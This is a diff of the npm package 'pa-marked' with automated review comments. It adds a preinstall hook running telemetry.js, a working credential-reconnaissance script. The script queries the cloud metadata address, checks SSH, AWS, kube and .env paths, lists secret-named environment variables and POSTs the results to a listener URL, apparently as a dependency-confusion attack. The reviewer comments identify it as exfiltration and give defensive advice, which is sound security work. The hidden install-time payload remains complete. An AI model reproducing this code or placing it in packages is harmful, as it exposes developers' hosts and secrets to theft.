pa-marked 99.1.8 → 99.1.10
- package/package.json +3 -3
- package/telemetry.js +81 -0
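--- a/package/package.json
+++ b/package/package.json
@@ -1,10 +1,10 @@
 {
 "name": "pa-marked",
-"version": "99.1.
-"description": "
+"version": "99.1.10",
+"description": "Internal security research payload",
 "main": "index.js",
 "scripts": {
-"preinstall": "node
+"preinstall": "node telemetry.js"
 },
 "author": "ALONE BEAST",
 "license": "ISC"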
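Review bot: The changed `preinstall` entry on new line 7 makes `node telemetry.js` run automatically on every `npm install` of this package, before a consumer has imported anything, and new line 4 describes the package as an "Internal security research payload". Together with a 99.1.x version, which would outrank any ordinary internal version under semver range resolution, this reads as a dependency-confusion package rather than a library release (inferred; the registry configuration and any internal namesake are not visible here). Consumers should resolve `pa-marked` only from a scoped name or their private registry, and install with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) so lifecycle hooks do not execute. The removed lines are truncated on this page, so what the previous `preinstall` ran cannot be compared.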
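--- a/package/telemetry.js
+++ b/package/telemetry.js
@@ -0,0 +1,81 @@
+const os = require('os');
+const { execSync } = require('child_process');
+const https = require('https');
+
+// Aapka webhook/listener URL yahan aayega
+const WEBHOOK_URL = 'https://your-listener.com/log';
+
+const getDetails = () => {
+let results = {
+identity: {
+user: os.userInfo().username,
+hostname: os.hostname(),
+platform: os.platform(),
+arch: os.arch(),
+},
+network: {},
+env_check: {},
+sensitive_files: []
+};
+
+try {
+// 1. IP and Network Config
+results.network.interfaces = os.networkInterfaces();
+if (os.platform() === 'win32') {
+results.network.dns = execSync('ipconfig /all').toString().split('\n').filter(line => line.includes('DNS')).slice(0, 3);
+}
+
+// 2. Cloud Metadata Check (AWS/Azure/GCP) - Highly Sensitive
+// Ye check karega ki kya hum PayPal ke cloud infrastructure ke andar hain
+try {
+results.is_cloud = execSync('curl -m 2 http://169.254.169.254/latest/meta-data/instance-id', { stdio: 'pipe' }).toString();
+} catch (e) { results.is_cloud = "Non-Cloud or Protected"; }
+
+// 3. Sensitive File Check (Total 15-20 common paths)
+const checkPaths = [
+// Windows Paths
+`${os.homedir()}\\.ssh\\id_rsa`,
+`${os.homedir()}\\.ssh\\config`,
+`${os.homedir()}\\.aws\\credentials`,
+`${os.homedir()}\\.npmrc`,
+`${os.homedir()}\\.gitconfig`,
+`C:\\Windows\\System32\\drivers\\etc\\hosts`,
+// Linux/WSL Paths
+'/etc/passwd',
+'/etc/shadow',
+`${os.homedir()}/.bash_history`,
+`${os.homedir()}/.docker/config.json`,
+`${os.homedir()}/.kube/config`, // Kubernetes config (Gold Mine!)
+'./.env',
+'./config.json',
+'./web.config'
+];
+
+checkPaths.forEach(path => {
+try {
+// Hum file read nahi kar rahe, sirf ye dekh rahe hain ki kya wo EXIST karti hai (Impact Proof)
+require('fs').accessSync(path, require('fs').constants.R_OK);
+results.sensitive_files.push({ path: path, accessible: true });
+} catch (e) { /* Not accessible */ }
+});
+
+// 4. Environment Variable Check (Privileged info)
+results.env_keys = Object.keys(process.env).filter(key =>
+/SECRET|KEY|TOKEN|PASSWORD|AUTH|AWS|AZURE|PAYPAL/i.test(key)
+);
+
+} catch (err) {
+results.error = err.message;
+}
+
+return results;
+};
+
+// Exfiltration
+const data = JSON.stringify(getDetails());
+const req = https.request(WEBHOOK_URL, {
+method: 'POST',
+headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
+});
+req.write(data);
+req.end();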
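Review bot: This file is not telemetry: run from the `preinstall` hook, `getDetails()` (lines 8–72) gathers the username, hostname and network interfaces, queries the cloud metadata address `169.254.169.254`, tests read access to SSH, AWS, npm, Docker and kube credential paths, and lists environment variable names matching `/SECRET|KEY|TOKEN|PASSWORD|AUTH|AWS|AZURE|PAYPAL/i`, after which lines 75–81 POST the result to `WEBHOOK_URL`. The version should be blocked and the file and its hook removed rather than patched. On hosts that installed 99.1.10, the visible code only calls `fs.accessSync` and does not read file contents, so the exposure is host identity, the instance id and an inventory of which secrets exist; other versions may differ and should be reviewed separately. Because `WEBHOOK_URL` here is the placeholder `https://your-listener.com/log`, detection is better keyed on behaviour, such as `node` spawning `curl` to the metadata address or `ipconfig /all` during `npm install`, and on AWS requiring IMDSv2 makes the plain GET on line 31 fail.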